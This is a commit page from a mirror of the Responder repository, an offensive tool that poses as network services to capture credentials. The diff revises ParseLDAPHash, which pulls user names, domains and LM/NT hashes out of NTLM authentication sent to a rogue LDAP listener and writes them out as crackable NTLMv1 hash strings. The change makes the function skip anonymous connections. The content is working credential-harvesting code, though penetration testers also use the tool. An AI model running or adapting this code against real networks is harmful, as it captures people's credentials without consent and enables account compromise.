github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-07 21:41:21 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

fix for anonymous NTLM connection for LDAP server

Browse source
This commit is contained in:
Lgandx 2013-02-14 18:26:39 -05:00
parent f5c1f9464a
commit 1c47e7fcb1
1 changed files with 22 additions and 17 deletions
Download patch file Download diff file Expand all files Collapse all files

39
Responder.py
View file

@ -965,23 +965,28 @@ def ParseSearch(data):
def ParseLDAPHash(data,client): def ParseLDAPHash(data,client):
SSPIStarts = data[42:] SSPIStarts = data[42:]
LMhashLen = struct.unpack('<H',data[56:58])[0] LMhashLen = struct.unpack('<H',data[54:56])[0]
LMhashOffset = struct.unpack('<H',data[58:60])[0] if LMhashLen > 10:
LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMhashOffset = struct.unpack('<H',data[58:60])[0]
NthashLen = struct.unpack('<H',data[64:66])[0] LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashOffset = struct.unpack('<H',data[66:68])[0] NthashLen = struct.unpack('<H',data[64:66])[0]
NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NthashOffset = struct.unpack('<H',data[66:68])[0]
DomainLen = struct.unpack('<H',data[72:74])[0] NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainOffset = struct.unpack('<H',data[74:76])[0] DomainLen = struct.unpack('<H',data[72:74])[0]
Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','') DomainOffset = struct.unpack('<H',data[74:76])[0]
UserLen = struct.unpack('<H',data[80:82])[0] Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserOffset = struct.unpack('<H',data[82:84])[0] UserLen = struct.unpack('<H',data[80:82])[0]
User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','') UserOffset = struct.unpack('<H',data[82:84])[0]
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
Outfile = "LDAP-NTLMv1-"+client+".txt" writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
WriteData(Outfile,writehash) Outfile = "LDAP-NTLMv1-"+client+".txt"
print "[LDAP] NTLMv1 complete hash is :", writehash WriteData(Outfile,writehash)
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash)) print "[LDAP] NTLMv1 complete hash is :", writehash
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
if LMhashLen <2 :
Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
print Message
logging.warning(Message)
def ParseNTLM(data,client): def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data) Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)